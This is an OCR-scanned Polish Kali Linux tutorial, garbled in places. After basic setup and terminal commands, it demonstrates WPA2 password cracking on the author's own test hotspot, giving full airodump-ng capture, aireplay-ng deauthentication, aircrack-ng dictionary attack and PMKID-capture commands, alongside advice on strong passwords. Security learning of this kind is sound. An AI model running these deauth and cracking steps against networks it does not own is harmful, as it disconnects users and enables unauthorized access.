szym dysku 


Wchodzimy na stronę https://www. 
google.com/intl/pl_pl/chrome i klika- 
my na Pobierz Chrome 


Opening google chrome -stable_current_amd64,deb 


D 6 nttps://www.googie.com/intt/pl_pl/chrome/ + 


You have chosen to open: 
4, Kali Tools © Kali Docs Ń Kali Forums X, NetHuhter © Offensive Security © Exploi P 


EH google-chrome-stable_current _amd64.deb 
which is: Pakiet Debiana (59.3 MB) 
from: https://dl.google.com 


Pobierz Chrome 


What should Firefox do with this file? 
Qpenwith  Xarchiver (default) v 


OsaveFile 


Do this gutomatically for files like this from now on. 


Zaznaczamy opcję z rozszerzeniem „deb 
i klikamy na Zaakceptuj i zainstaluj. 


Cancel OK 
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google-chrome 
stable_current_< Utwórz z s 
d64.deb 


Przechodzimy do lokalizacji z paczką 
instalacyjną i uruchamiamy w niej Ter- 
minator © (jeśli nie wykonaliśmy wskazów- 


stowania wszystkich plików i folderów w da- 
nej lokalizacji. 


Następnie wykonujemy polecenie sudo 

apt install ./śgoogle-chrome-stable_ 
current _amd64.deb © i standardowo za- 
twierdzamy instalację, wciskając [r] i [te]. 


Po instalacji nasz nowy program znajdzie- 
my w menu startowym 


ki ze strony 27 z edycją — 
menu kontekstowego, [2] | M 
będziemy musieli ręcznie 


przejść do tej lokalizacji). googlej 


NS 


c 


G Google Chrome 


Witamy w Chrome - Go... 


a” 


ra 


rw 


dr 
dr 
P 


Wpisujemy polecenie 
Is -I © w celu wyli- 
:-/Pobrane$ Ls -l 
zem 5254040 
C--r 1 krzysiek krzysiek 90418 lut 
-rw-r--r-- 1 krzysiek krzysiek 62181264 qgru 
wxr-xr-x 3 krzysiek krzysiek 4096 gru 
wxr-xr-x 2 krzysiek krzysiek 4096 gru 2 
W-r--r-- 1 krzysiek krzysiek 5317847040 gru 
:-/Pobrane$ | | 


apache user-enum-2.0.txt 
Pliki do testowania 

System Volume Information 
winle 1909 Polish x64.iso 


:-/Pobrane$ sudo apt install ./google-chrome-stable current amd64 . debjj 


POLECENIA W TERMINALU, KTÓRE WARTO ZNAĆ 


W systemie Kali Linux często trzeba korzy- 
stać z Terminalu, dlatego też warto poznać 
podstawowe polecenia. 

m pwd — wyświetla aktualną ścieżkę do 
katalogu, w którym pracujemy. 

m Is — wylistowanie wszystkich katalogów 
i plików w danej lokalizacji; dodając odpo- 
wiednie opcje, możemy uzyskać bardzo 
szczegółowe informacje, na przykład: 

m Is -| - pozwoli na poznanie szczegółów 
plików oraz ich uprawnień. 

m cd — zmiana katalogu, wpisując cd i na- 
zwę katalogu, będziemy mogli do niego 
przejść, a wpisując ed.. cofniemy się do 
katalogu wyżej. 

m man — skrót od manual, czyli instrukcja, 
wystarczy wpisać man i nazwę komendy, 


aby poznać dołączone do niej instrukcje, 
na przykład man Is. 

m mkdir nazwa katalogu — tworzenie 
katalogu o podanej nazwie. 

m cp — kopiowanie, na przykład: cp pliki 
plik2 — pierwszy plik jest źródłowy, drugi 
docelowy, możemy tak też kopiować 
katalogi, musimy wtedy użyć flagi -r oraz 
wskazywać dokładne ścieżki kopiowania. 

m mv - przenoszenie, działa podobnie jak 
kopiowanie, z tą różnicą, że plik źródłowy 
jest przenoszony, a nie kopiowany. 

m rm — usuwanie plików i katalogów, gdy 
wpiszemy rm pliki lub podamy całą 
ścieżkę do pliku w innej lokalizacji, zosta- 
nie on usunięty; w przypadku katalogów 
musimy dodać flagę -r 


:-/Muzyka$ rm -r Test2 
:-/Muzyka$ ls 
:-/Muzyka$ 
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Obrona przed 
atakami na sieć 
bezprzewodową 


W tym rozdziale skupimy się na tym, w jaki sposób są 
atakowane sieci bezprzewodowe, na czym polega proces 
dekodowania zabezpieczeń, a potem zapoznamy się 

z metodami, które pozwolą nam na ochronę przed atakami 


Standardy szyfrowania i rodzaje ataków 


taki na sieci bezprzewodowe można po- 

dzielić na kilka grup. W tym rozdziale 
skupimy się na atakach, które umożliwiają 
atakującym dostęp do punktu dostępowego, 
na przykład naszego routera. Ataki mogą być 
pasywne lub aktywne. Różnica polega na tym, 
że ataku pasywnego nie jesteśmy w stanie za- 
uważyć, przez co nie możemy odpowiednio 
zareagować, a w wypadku ataku aktywnego 
przeważnie są widoczne ślady lub możemy 
go odczuć, korzystając z sieci. Często jednak 
wpływ ataku jest na tyle znikomy, że użytkow- 
nicy mogą go nie zauważyć. W kolejnych roz- 
działach skupimy się na atakach w sieciach, 
do których atakujący ma już dostęp. 
W przypadku uzyskania dostępu do sieci 
bezprzewodowej największe znaczenie ma 
standard szyfrowania użyty do jej zabezpie- 
czenia. W routerach dostępnych na rynku 
można znaleźć głównie szyfrowanie typu 
WPA2, wcześniej jednak korzystano z WPA 
i WEP. Uwaga! Jeśli ktokolwiek jeszcze ko- 
rzysta z szyfrowania WEP, powinien natych- 
miast zmienić je na WPA2, gdyż nie zapewnia 
ono żadnej ochrony i zostało dawno złamane. 
Szyfrowanie WPA2 można podzielić na dwa 
tryby: 
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z WPA2 Personal, gdzie wszystkie stacje 
wykorzystują jeden klucz główny. 

z WPA2 Enterprise, gdzie dodatkowo wy- 
korzystywany jest serwer RADIUS, który od- 
powiada za przydzielenie osobnych kluczy 
konkretnym użytkownikom (rozwiązanie 
to nie jest wykorzystywane w środowisku 
domowym). 

Dodatkowo warto wiedzieć, że szyfrowanie 
WPA2 zostało wprowadzone w 2006 roku 
i od tamtej pory wykryto w nim kilka sła- 
bości, które połączone z nieświadomością 
użytkowników pozwalają na łatwe wejście 
każdemu atakującemu. 

Od 2018 roku rozpoczęto prace nad stan- 
dardem WPA3, który ma znacznie poprawić 
bezpieczeństwo sieci dzięki wykorzystaniu 
192-bitowego szyfrowania oraz indywidu- 
alnego klucza szyfrującego dla każdego 
użytkownika. Jednak zanim wejdzie do 
publicznego użytku, musimy wiedzieć, jak 
zabezpieczyć się przed atakami na istniejące 
już szyfrowania. 

Istnieje jeszcze standard WPS lub QSS, który 
umożliwia szybkie łączenie się z punktem do- 
stępowym. Znaleziono w nim wiele luk bez- 
pieczeństwa i nie zaleca się z niego korzystać. 
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Testowy punkt dostępu Wi-Fi 


P onieważ zamierzamy testować zabezpie- 
czenia sieci bezprzewodowych, należy 
wiedzieć o kilku zasadach. Możemy przepro- 
wadzać dowolne testy na sieciach, których 
jesteśmy administratorami, czyli takich, które 
są nasze. Testowanie sieci domowej, z której 
korzysta kilku użytkowników, nie jest jednak 
wskazane, gdyż możemy powodować zrywa- 
nie połączeń i inne komplikacje. Dlatego też 
najprostszym sposobem na umożliwienie so- 
bie nauki jest utworzenie testowego punktu 


U © wl 42%80) 1729 


dostępowego 


System settings Z pseudorou- 


tera z naszego smartfona. Zobaczmy, jak 
stworzyć taki punkt dostępowy ze smartfona 
z systemem Android. 


Przechodzimy do ustawień systemo- 
wych, a następnie szukamy opcji Perso- 
nal hotspot © lub Punkt dostępowy. 


Następnie podajemy konfigurację nasze- 
go punktu i aktywujemy go 


Po chwili będziemy mogli się z nim połą- 
czyć w naszym komputerze 


© Tryb samolotowy 
G Wi-Fi 


© Bluetooth 


Personal hot. 


© Dual SIM 8 mobile networks 


Name 
©) Personal hotspot m" 
wi 
© "" Zabezpieczenia 


[c) Wyświetlacz 
© Personalize 


©) Sounds 8 vibration 


o ż 
88 


ADO zetheza 


Przenośny hotspot Wi-Fi 


Tethering przez Bluetooth 


m © = 42%1807 1730 


sdżer .. | Ba r4 - Menedżer _ pią O3sty, 13:11 


spot | Sieć ethernetowa 


Sieci Wi-Fi (Intel 8260) 


Rozłącz 


Sieci Wi-Fi (Qualcomm Atheros AR9271) 


Test.KS 
Połącz z ukrytą siecią Wi-Fi 


Utwórz nową sieć Wi-Fi 


Połączenia VPN 


Testujemy sieć z ochroną WPA2 


ieci zabezpieczone standardem WPA2 

to obecnie najczęściej spotykane sieci 
bezprzewodowe. Ponieważ to szyfrowanie 
jest wykorzystywane od wielu lat, znaleziono 
w nim kilka słabości. W przypadku odmiany 
WPA2 Personal, która wykorzystywana jest 
przez użytkowników domowych, możemy 


dość precyzyjnie oszacować szybkość deszy- 
frowania hasła. Czas podany w tabelce na 
kolejnej stronie to najbardziej pesymistycz- 
ny scenariusz, a zastosowanie słowników 
znacząco przyspiesza deszyfrowanie haseł 
typowych użytkowników. Należy tworzyć 
jak najdłuższe hasła (a przynajmniej 16-zna- 
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obrona przed atakami na sieć bezprzewodową 


kowe) składające się z różnych znaków, cyfr 
oraz symboli - dzięki temu będą praktycznie 
nie do złamania. 


Szybkość deszyfrowania hasła podana jest 
dla typowego konsumenckiego komputera 
z podzespołami dobrej klasy. 


CZASY DESZYFROWANIA HASŁA 0 DŁUGOŚCI 8 ZNAKÓW 


METODA SIŁOWA WYKORZYSTUJĄCA MOC OBLICZENIOWĄ PROCESORA 


DŁUGOŚĆ LICZBA 


CZAS POTRZEBNY NA ZŁAMANIE HASŁA 


WYKORZYSTANE ZNAKI 


HASŁA KOMBINACJI (DLA SZYBKOŚCI 1x105/S KLUCZY) 
10 (liczby) 8 1x108 mniej więcej 2 minuty 
26 (małe lub duże litery) 8 2x1011 mniej więcej 2,5 dnia 
52 (małe i duże litery) 8 5,3x103 mniej więcej 1,5 roku 
62 (litery i cyfry) 8 2,2x1014 mniej więcej 7 lat 
96 (wszystkie dostępne znaki) 8 7,2x105 mniej więcej 229 lat 


TESTOWANIE ZABEZPIECZEŃ 
TYLKO Z ODPOWIEDNIĄ 
KARTĄ SIECIOWĄ 


Aby utrudnić atakującym rozpoznawanie słabości 
zabezpieczeń sieci, na terenie UE obecnie nie są 
dopuszczane do sprzedaży nowe karty sieciowe, 
które mogą służyć do tego celu. Pełna lista 
wspieranych kart znajduje się pod adresem - 


https://miloserdov.org/?p=2196 


W dalszych opisach wykorzystywana będzie 
karta TP-LINK TL-WN722N/NC (rev vi, Atheros 
AR9271) „która w pełni wspiera monitor mode 
oraz injection mode, niezbędne do przeprowadza- 


nia testów bezpieczeństwa. 


Sieć ethernetowa 
rozłączone 
Sieci Wi-Fi (Intel 8260) 


ad57Z 


Hd 


Rozłącz 


Sieci Wi-Fi (Qualcomm Atheros AR9271) k 
rozłączone 


Dostępne 


Połącz z ukrytą siecią Wi-Fi... 
Utwórz nową sieć Wi-Fi... 
Połączenia VPN > 


Jak sprawdzić bezpieczeństwo sieci Wi-Fi 


Wi." już, że bezpieczna sieć to odpo- 
wiednie hasło i typ uwierzytelniania. 
Przeczytajmy teraz, jak samemu sprawdzić 
siłę naszego hasła, stosując narzędzia dostęp- 
ne w systemie Kali Linux. 

Wykorzystamy specjalny pakiet airerack-ng 
wchodzący w skład Kali Linuxa, który zawie- 
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ra kilka narzędzi mających jasny i określony 
cel - analiza sieci bezprzewodowych i testo- 
wanie ich zabezpieczeń. W internecie znaj- 
duje się lista adapterów i kart sieciowych, 
które są zatwierdzone przez twórców tego 
programu. Nie będziemy mogli z niego ko- 
rzystać na typowej karcie sieciowej w lapto- 
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krzysiekćkali:-$ sudo airmon-ng 


PHY Driver 


Interface 


iwiwifi 
ath9k_htc 


Chipset 


Intel Corporation Wireless 8260 (rev 3a) 
Qualcomm Atheros Communications AR9271 862.11n 


pie, gdyż takie karty nie zapewniają obsługi 
trybów monitor mode i injection mode (mo- 
nitora i wstrzykiwania), które są niezbędne 
do wykonania testowego ataku. Dlatego 
musimy mieć kompatybilny moduł sieciowy. 


Po uruchomieniu systemu Kali Linux 

i podłączeniu odpowiedniego adapte- 
ra sieciowego uruchamiamy Terminal, 
wpisujemy i zatwierdzamy komendę sudo 
airmon-ng. 


Nasz nowo podłączony adapter powinien 
znajdować się na końcu. W naszym przy- 
padku, ze względu na to, że w komputerze 


testowym jest już bezprzewodowa karta sie- 


ciowa, adapter USB został przypisany jako 
wlani. Możemy rozpoznać go po wpisie 
w kolumnie Chipset 


Następnie zatwierdzamy komendę sudo 
airmon-ng start wlani [N, uruchomi to 
tryb monitora wlanimon na karcie Wi-Fi i po- 
zwoli na skanowanie w poszukiwaniu sieci. 


Ponownie wpisujemy komendę sudo air- 

mon-ng i sprawdzamy, czy tryb monitora 
został aktywowany - musi pojawić się wpis 
mon [H] na końcu aktywowanego interfejsu 
sieciowego. 


krzysiekcćkali:-$ sudo airmon-ng start wlan1[J 


[sudo] hasło użytkownika krzysiek: 


Found 2 processes that could cause trouble. 

KilL them using 'airmon-ng check kill' before putting 

the card in monitor mode, they will interfere by changing channels 
and sometimes putting the interface back in managed mode 


PID Name 
859 NetworkManager 
986 wpa_supplicant 


PHY InLer [ace Driver 
phyo wlane iwlwifi 
phyl wlan1l ath9k_htc 
02.11n 

(mac88211 monitor mode 
1mon) 


(mac86211 station 


krzysiekckali:-$ |] 


Chipsel 


Intel Corporation Wireless 8260 (rev 3a) 


Qualcomm Atheros Communications AR9271 8 


vif enabled for [phyl]wlan1 on [phyl]wlan 


mode vif disabled for [phyllwlan1) 


krzysiekekali:-$ sudo airmon-ng 


PHY Interface Driver 
phyo wlano iwiwifi 
phy1 wLan1mon [-] ath9k_htc 


Chipset 


Intel Corporation Wireless 82606 (rev 3a) 
Qualcomm Atheros Communications AR9271 802.1ln 
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CH 6 ][ Elapsed: © s ][ 2020-01-03 11:17 


BSSID PWR  Beacons 
60:E3:27:57:28:34 -88 2 8 
24:A4:3C:F0:24:47  -86 2 © 
60:45:CB:12:3B:18  -64 4 4 
28:FE:CD:05:4B:3B  -40 8 e) 
D4:6E:0E:6D:80:F7  -86 2 e) 
BSSID STATION PWR 


60:45:CB:12:3B:18 /A4:34:D9:50:E6:1E -34 


krzysiekekali:-$ sudo airodump-nq wlanimonij 


*Data, ż/s CH MB 


ENC CIPHER AUTH ESSID 


8 8 276 WPA2 CCMP PSK * 

e 13 65 WPA2 CCMP PSK z 

0 6 2760 WPA2 CCMP PSK o Śzzcsiywś* 
©) 6 65 WPA2 CCMP PSK Test KS 

) 1 270 WPA2 CCMP PSK 5 STER 
Rate Lost Frames Probe 

Cro 2 0 4 


Następnie wpisujemy sudo airodump- 
-ng wlanimon 6. Rozpocznie się skano- 
wanie sieci w naszym otoczeniu. 


Dzięki temu będziemy mogli dowiedzieć 
się, jak zabezpieczone są poszczególne 
sieci. W naszym przykładzie testujemy zabez- 
pieczenia naszej sieci Test_KS, do której ha- 
sło znamy i której jesteśmy administratorami. 


7 Zatrzymujemy skanowanie, wciskając 
kombinację klawiszy [«r]+([G, a następnie 
uruchamiamy komendę sudo airodump-ng 
--bssid XX:XX:XX:XX:XX -cY --write Pliki 
wlanimon ©. Zamiast X i Y podajemy dane 
naszej sieci, które powinny być widoczne 
na ekranie w punkcie 5. BSSID znajdziemy 
w pierwszej kolumnie, a € to oznaczenie ka- 
nału, czyli kolumna CH. 


krzysiekekali:-$ sudo airodump-ng --bssid 28:FE:CD:05:4B:3B -c 6 --write Plikl wtanimon| 


SŁOWNIK HASEŁ 


Domyślnie w systemie Kali 
Linux słownik haseł jest 
spakowany. Zanim będziemy 
mogli z niego skorzystać, 
musimy go wypakować. 
Uruchamiamy Terminal, 
wpisujemy polecenie sudo 
thunar i przechodzimy do 
lokalizacji /usr/share/wor- 
dlists/. Następnie klikamy 
prawym przyciskiem myszy 
na plik rockyou.txt.gz 

i z menu dialogowego wybieramy opcję 
Rozpakuj tutaj! 

Po chwili będziemy mieli do 

dyspozycji plik z hasłami 

Jest to dość podstawowy 

słownik, który zawiera 


NOŚNIKI 
2 System plików 
2. Katalog głów... 
2. cdrom0 
POŁOŻENIA 
root 
EH Pulpit 
SIEĆ 
M Przeglądanie — 
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Plik Edycja Widok Przejdź Pomoc 
- > 4 M miusrjstarejwordlistsj 


Uwaga: używane konto należy do użytkowanika root. istnieje niebezpieczeństwo uszkodzenia systemu. 


mę W R. BR, 


dirb dirbuster tern-wifi metasploit 


wfuzz fasttrack.txt nmap.lst 


"rockyou.txt.gz": 50,9 MiB (53357 329 bajtów) Archiwum gzip 


zaledwie nieco ponad 7 milionów haseł. 
Możemy też samodzielnie pobrać słow- 
niki znacznie obszerniejsze, zawierające 
najbardziej popularne hasła, i sprawdzić, 
czy nie ma w nich naszego aktualnego 
hasła do sieci. 
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krzysiekGkali:-$ sudo aireplay-ng --deauth 100 -a 28:FE:CD:05:4B:3B wlanlmo 


|krzysiekekali:-$ sudo aircrack-ng Plik1-01.cap -w /usr/share/wordlists/rockyou.txt 


Teraz musimy przechwycić zakodowane 

hasło dostępu do sieci. Uda się to wtedy, 
gdy jakiś użytkownik połączy się z tą siecią lub 
my wymusimy rozłączenie użytkownika, któ- 
ry za chwilę automatycznie się połączy - wte- 
dy będziemy mogli przechwycić zakodowane 
hasło. (Metoda ta zadziała tylko wtedy, gdy do 
atakowanego w ramach testu punktu podłą- 
czony jest przynajmniej jeden użytkownik). 


W nowym oknie Terminalu wpisujemy 

komendę sudo aireplay-ng --deauth 
100 -a XX:XX:XX:XX:XX:XX wianimon 6, 
ponownie w miejsce X podajemy dane punk- 
tu dostępowego. Jest to bardzo agresywny 
atak, który przez 100 sekund co sekundę roz- 
łącza wszystkich użytkowników testowanej 
przez nas sieci. Oczywiście można go skrócić 
do na przykład 20 sekund, zmieniając para- 


nieważ hasło jest już zapisane w pliku Pliki 


na naszym komputerze. 
1 i PA musimy w nowym oknie 
Terminalu wpisać komendę sudo 
aircrack-ng Plik1-01.cap -w [lokalizacja 
słownika] © i zatwierdzić. Deszyfrowanie 
hasła taką metodą może być bardzo czaso- 
chłonne i nieefektywne, gdyż wykorzysty- 
wany jest słownik. Jeśli hasła nie ma w słow- 


niku, nie zostanie znalezione. 
1 W przypadku tego specjalnie usta- 
lonego hasła 12345678 © czas od- 
szyfrowania był bardzo krótki (mniej niż 
1 sekunda), ponieważ jest to bardzo proste 
hasło i było zawarte w naszym słowniku na 
samym początku. Sredniej klasy komputer 
sprawdza 500-1500 haseł na sekundę. 


metr --deauth 100 na --deauth 
20. Po jego zakończeniu rozłą- 
czeni klienci będą próbowali 
automatycznie nawiązać połą- 
czenie, przesyłając zaszyfrowa- 


ne hasło. 
1 Wtedy w Terminalu 
z punktu 7 w prawym 
górnym rogu powinien pojawić 
się napis WPA handshake 
oraz adres MAC punktu do- 
stępowego. Możemy zamknąć 
wszystkie okna Terminalu, po- 


Time left: 3 


Master Key 


EAPOL HMAC 
lekekali:-s |] 


[00:00:60] 128/7120712 keys tested (536.86 k/s) 


Transient Key 


Aircrack-ng 1.5.2 


hours, 41 minutes, 24 seconds 8.00% 
KEY FOUND! | 12345678 |] 
El 8E 79 80 B4 5F AF 6A 11 00 43 6E 61 DE 64 AE 
92 7D 14 C9 E© ©F ©E C8 CF 1D 60 64 063 12 51 78 
2D 4D 55 98 17 AC 9E E4 DE E4 D7 72 97 BF D9 IA 
70 FF E4 CA 1B BF 39 F6 9A A8 95 16 BF 12 87 C1 
41 2A A8 C8 C3 3B OF 44 E5 B6 E6 BB AD 74 D6 6A 
29 B9 AE 6D 2B DO FO 5F 15 80 5F 47 1F 51 00 AA 
5D AD A5 BF 22 D6 AF A6 8A AB E2 7D E2 BE D9 F9 


CH 6 ][ Elapsed: 6 mins ][ 2020-01-03 11 


BSSID PWR RXQ  Beacons 4D. 
28:FE:CD:05:4B:3B -41 100 3633 

B5SID STATION PWR 
28:FE:CD:05:4B:3B 00:0A:F5:89:89:FF  -66 


:40 ][ WPA handshake: 28:FE:CD:05:4B:3B 


ata, 4/s CH MB  ENC CIPHER AUTH ESSID 
956 0 6 65 WPA2 CCMP PSK Test KS 
Rate Lost Frames Probe 
le- 6e 38 398 Test KS 
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a ; 
© 25 JAK SIĘ ZABEZPIECZYĆ PRZED WŁAMANIEM DO SIECI WI-FI 


Cały proces jest znacznie trudniejszy 
i bardziej skomplikowany w przypadku 
prawdziwej sieci, możemy jednak wyciąg- 


nąć z tego naukę — im dłuższe i bardziej 
złożone hasło, tym trudniejsze jest do 
złamania. Zaleca się stosowanie hasła 
przynajmniej 16-znakowego, składają- 
cego się z małych i dużych liter, cyfr oraz 


znaków specjalnych. Nasze hasło będzie 
wtedy praktycznie nie do złamania, dzięki 
czemu będziemy bezpieczni. Mocne hasło 
to właściwie jedyna ochrona w warunkach 
domowych. 

Routery domowe nie mają żadnej ochrony 
przed pakietami deauth, które blokują 
użytkownikom dostęp do Wi-Fi. 
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Testowanie zabezpieczeń WPA2: PMKID 


poprzedniej metodzie symulowania 

ataku na sieć zabezpieczoną szyfro- 
waniem WPA2 konieczne było pozyskanie 
WPA handshake, czyli tak naprawdę prze- 
chwycenie pełnych czterech komunikatów 
sieciowych przesyłanych przy nawiązywa- 
niu poprawnego połączenia z punktem 
dostępowym. 
Metoda testowania zabezpieczeń PMKID nie 
wymaga tego - jest jednak bardziej skom- 
plikowana. Jest to metoda, która pozwala 
na pozyskanie zaszyfrowanego hasła bez 
przesyłania pakietów deauth, bez innych 
klientów w danej sieci - wystarczy tylko na- 
sza karta sieciowa. Metodę tę odkrył w 2018 
roku Jens Steube. 


Przygotowania do testowego 
ataku metodą WPA2 - PMKID 

Do korzystania z tej metody musimy się 
przygotować. Potrzebna jest oczywiście 
kompatybilna karta sieciowa oraz narzędzia 
hashcat w wersji powyżej 4.2.0, hextools 
oraz hexdumptool, dodatkowe pakiety 
i sterowniki. 


Wykonujemy komendy: 

sudo apt-get update 
sudo apt-get install libcurl4-openssl-dev 
libssl-dev zlib1ig-dev libpcap-dev 


Następnie upewniamy się, że hashcat 
jest w wersji przynajmniej 4.2.0 - wy- 


krzysiekćkali:-$ sudo apt-get install libcurl4-openssl-dev libssl-dev zliblg-dev 


libpcap-dev 
Czytanie list pakietów... Gotowe 
Budowanie drzewa zależności 


Odczyt informacji o stanie... Gotowe 


Następujący pakiet został zainstalowany automatycznie i nie jest już więcej wyma 


gany: 
opencl-orca-amdgpu-pro-icd 


Aby go usunąć należy użyć "sudo apt autoremove". 
The following additional packages will be installed: 


libpcapo.8-dev 
Sugerowane pakiety: 


libcurl4-doc libidn11l-dev libkrb5-dev libldap2-dev librtmp-dev libssh2-1-dev 


Llibssl-doc 


Zostaną zainstalowane następujące NOWE pakiety: 
Libcurl4-openssl-dev Libpcap-dev Libpcapó.8-dev Libssl-dev zliblg-dev 
© aklualizowanych, 5 nowo instalowanych, © usuwanych i 46 nieaklualizowanych. 


Konicczne pobranic 2 713 kB archiwów. 


Po tej operacji zostanie dodatkowo użyte 10,9 MB miejsca na dysku. 


Kontynuować? [T/nl H 
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starczy w Terminalu wpisać komendę hash- 
cat --version 


krzysiekEkali:-$ hashcat --version 


v5.1.0 
krzysiekGkali:-$ |] 


Teraz instalujemy narzędzie hextools, 
wykonując kolejno komendy: 
git clone https://github.com/ZerBea/ 
hextools.git [I 


cd hcxtools 


krzysiekEkali:-$ cd hcxtools/ 
krzysiekękali:-/hcxtools$ |] 


sudo make $$ sudo make install []. 


Następnie instalujemy narzędzie 
hcxdumptool, wykonując kolejno ko- 
mendy (zanim je wykonamy, poleceniem 
pwd upewnijmy się, że jesteśmy w głównej 
lokalizacji naszego użytkownika /home/ 
[nazwa_użytkownikal): 
krzysiekGkali:-$ pwd 
/home/krzysiek 


git clone https://github.com/ZerBea/ 
hcxdumptool.git 7] 


cd hcxdumptool/ 


krzysiekGkali:-$ cd hcxdumptool/| 
krzysiekGkali:-/hcxdumptool$ |] 


sudo make 8.8 sudo make install F]. 


krzysiekekali:-$ git clone https://github.com/ZerBea/hcxtools.git 


Cloning into 'hcxtools'... 


remote: Enumerating objects: 99, done. 

remote: Counting objects: 100% (99/99), done. 

remote: Compressing objects: 100% (68/68), done. 

remote: Total 5570 (delta 57), reused 66 (delta 31), pack-reused 5471 
Receiving objects: 100% (5570/5570), 1.71 MiB | 1.62 MiB/s, done. 
Resolving deltas: 100% (3874/3874), done. 


krzysiekGkali:-$ |] 


[sudo] hasło użytkownika krzysiek: 
mkdir -p .deps 
cc -03 -Wall -Wextra -std=gnu99 


krzysiekekali:-/hcxtools$ sudo make 66 sudo make install [:] 


-MMD -MF .deps/hcxpcapngtool.d 


krzysiekEkali:-$ git clone https://github.com/ZerBea/hcxdumptool.git 


Cloning into 'hcxdumptool'... 


remote: Enumerating objects: 45, done. 

remote: Counting objects: 100% (45/45), done. 

remote: Compressing objects: 100% (34/34), done. 

remote: Total 2039 (delta 24), reused 24 (delta 11), pack-reused 1994 
Receiving objects: 100% (2039/2039), 731.00 KiB | 511.00 KiB/s, done. 
Resolving deltas: 100% (1376/1376), done. 


krzysiekGkali:-$ |] 


rm -f hcxpioff 

rm -f hcxdumptool 

rm -f *.o *— 
krzysiekękali:-/hcxdumptool$ |] 


krzysiekćkali:-/hcxdumptool$ sudo make 66 sudo make instatt [-] 


[sudo] hasło użytkownika krzysiek: 

cc -03 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c 

cc -03 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -Llcrypto 
cc -03 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c 

cc -03 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -Llcrypto 


install -m 0755 -D hcxpioff /usr/local/bin/hcxpioff 
install -m 0755 -D hcxdumptool /usr/local/bin/hcxdumptool 
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Po wykonaniu tych kroków możemy przy- 
stąpić do testowego ataku WPA2 - PMKID. 
Uwaga! Na potrzeby testu zmieniamy hasło 
naszego punktu dostępowego na 87654321, 
żeby trudniej było je odszyfrować. 


Testowy atak WPA2 - PMKID 
Uruchamiamy tryb monitora na naszej 
karcie sieciowej, podobnie jak w po- 


przednim typie ataku: 
sudo airmon-ng start wlani ©. 


my przechwycić. Wpisujemy polecenie: 
sudo airodump-ng wlanimon 


Interesująca nas sieć ma nazwę ESSID 
Test_KS. Zapisujemy jej BSSID (adres 
MAO) do pliku tekstowego i wyłączamy tryb 
monitora karty sieciowej: 
echo [BSSID sieci] >> targets.txt 
sudo airmon-ng stop wlanimon 


krzysiekekali:-$ sudo airmon-ng start wtani | 


”. a wykonujemy polecenie: 
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Następnie skanujemy w poszukiwaniu 
sieci, do której zaszyfrowane hasło chce- 


sudo hcxdumptool -i wlani --enable 
_status 15 --filterlist_ap=targets.txt 
--filtermode=2 -o capturefile3.pcapng 


CH 2 ]1[ Elapsed: 6 s 1[ 2020-01-03 15:27 


BSSID PWR  Beacons śData, 
"WSLZHA RYZEJTEK -55 3 2 

F4:30:B9:E9:0C:C6 84 2 o 

60:F3:27:57:728:34  -A85 2 a 

BSSID STATION PWR 
(not associated) C6:D5:1E:C2:DE:8D  -43 
(not associated) 00:0A:F5:89:89:FF  -51 
(not associated) 50:EC:50:13:20:EA  -54 
(not associated) 1C:C6:3C:A0:94:4A  -63 
(not associated)  AC:84:C6:3F:9E:5C  -83 


krzysiekGkali:-$ echo 6045cb123b18 >> 


targets.txt|] 


4/s CH MB  ENC CIPHER AUTH ESSID 
© 6 276 WPA2 CCMP PSK TeslL_KS 
o 6 65 WPA2 CCMP PSK aETFJ w" 
a 8 7278 WPA? CCMP PSK * dm » 
Rate Lost Frames Probe 
6 - 1 © 2 m m="H 
6 - 1 4 3 
8 - I [c 4 ua m 
8 - i 17 5 
8 - 1 34 12 "umi! 


WYŁĄCZAMY TRYB MONITORA NA KARCIE SIECIOWEJ 


Pamiętajmy, aby wyłączyć tryb monitora 
na naszej karcie sieciowej. Jeśli jest on ak- 
tywny, z karty nie będzie można korzystać 
do łączenia się z punktami dostępowymi. 
Uruchamiamy Terminal i wpisujemy pole- 


krzysiekćkali:-$ sudo airmon-ng stop wlanlmon 
[sudo] hasło użytkownika krzysiek: 


Interface Driver 


wLang 
wlanlmon 


iwiwifi 
ath9k_htc 


cenie sudo airmon-ng stop wilanimon 
Po wyłączeniu trybu monitora automatycz- 
nie zostanie aktywowany tryb zarządzania, 
który pozwala na normalne korzystanie 
z karty sieciowej. 


Chipset 


Intel Corporation wireless 8266 (rev 3a) 
Qualcomm Atheros Communications AR9271 802.11n 


(mac86211 station mode vif enabled on [phyl]wlan1) 


(mac80211 monitor mode vif disabled for [phyl]wlanlmon) 


i:-$ 
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krzysiekekali:-$ sudo hcxdumptool -i wlan1l --enable_status 15 --filterlist ap=targets.txt --fil 
ltermodc=2 -o pmkid_plikl.pcapng 

initialization... 

arning: NetworkManager is running with pid 15578 
(service possbile interfering hcxdumptool) 
arning: wpa_supplicant is running with pid 15598 
(service possbile interfering hcxdumptool) 


start capturing (stop with ctrl+c) 
INMEA 0183 SENTENCE......: N/A 
INTERFACE NAME....... : wlanl 
INTERFACE HARDWARE MAC..: 18d6c70bccb4 
: athgk_htc 
DRIVER VERSION : 5.3.0-kali2-amd64 
DRIVER FIRMWARE VERSION.: 1.4 
: 100 errors 
1 entries 
: 8 entries 
RZ 
: 12345678 
: 8 entries 
000e17ceescd (incremented on every new client) 
bo25aaa0c236 
: 647/18 
: 1e60ba136a04c8abb7ace5192b40c8aac48373a251db7c3c4b5285cdb8251fc6 
: 521de704bb7ed602c39c1c9dcc7491660b1f16dda73a073668b0ca308d01cf83 


:30:31 13 f430b9e90cc5 --> ffffffffffff PROBE REQUEST "ui JEF"Y 

15:38:31 6 bA?5aaaQc236 <-- 6045ch123b18 PROBE RESPONSE (Test KS) 

15:38:31 6 bA?5aaaQc236 <-- f438b39e90cc6 PROBE RESPONSE  AMFY. "a M. «uła "M nv .a 
15:36:32 6 b©25aaa6c236 <-> 6045cb123b18 PMKID:44e82e8899(8153868bd11636d9befba (Test KS) 


terminating... 


rzysiekaGkali:-$ sudo hcxpcaptool -z pmkid _plikl. 16800 pmkid plik1.pcapnq 
[sudo] hasło użytkownika krzysiek: 


reading from pmkid plik1.pcapnq 


Pozostawiamy ak- summary capture file: 


tywne okno skano- 
wania na przynajmniej 
10 minut 6. W trakcie 
tego czasu powinniśmy 
przechwycić pakiety 
PMKID. Wtedy zatrzy- 
mujemy skanowanie, 
wciskając kombinację 
